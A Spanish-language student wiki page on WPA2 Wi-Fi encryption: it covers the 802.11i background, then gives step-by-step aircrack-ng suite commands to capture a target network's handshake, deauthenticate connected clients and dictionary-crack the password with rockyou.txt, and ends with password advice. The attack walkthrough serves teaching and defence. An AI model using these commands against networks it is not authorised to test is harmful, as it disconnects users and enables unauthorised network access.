Trabajo:Seguridad WPA

De FdIwiki ELP
Saltar a: navegación, buscar

Cifrado WPA2

WPA2 está basada en el nuevo estándar 802.11i. WPA, por ser una versión previa, que se podría considerar de "migración", no incluye todas las características del IEEE 802.11i, mientras que WPA2 se puede inferir que es la versión certificada del estándar 802.11i.

El estándar 802.11i fue ratificado en junio de 2004.

La Wi-Fi Alliance llama a la versión de clave pre-compartida WPA-Personal y WPA2-Personal y a la versión con autenticación 802.1x/EAP como WPA-Enterprise y WPA2-Enterprise.

Los fabricantes comenzaron a producir la nueva generación de puntos de accesos apoyados en el protocolo WPA2 que utiliza el algoritmo de cifrado AES (Advanced Encryption Standard). Con este algoritmo será posible cumplir con los requerimientos de seguridad del gobierno de USA - FIPS140-2. "WPA2 está idealmente pensado para empresas tanto del sector privado cómo del público. Los productos que son certificados para WPA2 le dan a los gestores de TI la seguridad que la tecnología cumple con estándares de interoperatividad" declaró Frank Hazlik Managing Director de la Wi-Fi Alliance. Si bien parte de las organizaciones estaban aguardando esta nueva generación de productos basados en AES es importante resaltar que los productos certificados para WPA siguen siendo seguros de acuerdo a lo establecido en el estándar 802.11i.

Problemas de seguridad

Hoy en dia es el más utilizado en hogares, el único "fallo" es que te pueden quitar el handshake y sacar la contraseña de forma offline mediante prueba y fallo con diccionarios.

Cómo ataca un ladrón

El objetivo para conseguir una contraseña WPA o WPA2 es capturar el handshake que se produce cuando un usuario se conecta a la red wifi.

1.) Miramos la interfaz que tiene nuestra tarjeta de red para ponerla en modo monitor

  1. ifconfig

2.) Ponemos la tarjeta de red en modo monitor para poder capturar todos los paquetes wifi que circulan por el aire

  1. airmon-ng start wlan0

3.) Seleccionamos la red wifi que queremos auditar y capturamos solo los paquetes dirigidos a esa red

  1. airodump-ng -c <CANALAP> --bssid <BSSID> -w fichero_captura_paquetes wlan0mon

4.) Necesitamos esperar a que haya clientes conectados a esa red para poder capturarles el handshake. Cuando eso ocurra vamos a lanzar paquetes de desautenticación para echarles de la red y poder capturarles el handshake justo cuando se conecten.

  1. aireplay-ng -0 15 -a <BSSID> wlan0mon

5.) Una vez capturado el handshake procedemos a crackearlo por fuerza bruta con un diccionario bastante común ‘rockyou.txt’.

  1. aircrack-ng fichero_captura_paquetes-01.cap -w /usr/share/wordlists/rockyou.txt

Cómo mantenerte seguro ante estos ataques

Los principales fallos de seguridad de este cifrado son las propias personas, aqui unos consejos a seguir para escoger contraseña:

· No dejes nunca la contraseña por defecto. · Intenta utilizar mayúsculas, minúsculas, números y caracteres especiales. · No utilices como contraseña palabras o frases conocidas o cercanas a ti. · No apuntes en un post it la contraseña y la pegues al router. · No dejes el nombre del router por defecto o sabrán fácilmente el tipo de router.

Si pones frases o palabras conocidas conseguirán facilmente tu contraseña con diccionarios tipo rock you.

Enlaces externos

https://es.wikipedia.org/wiki/WPA2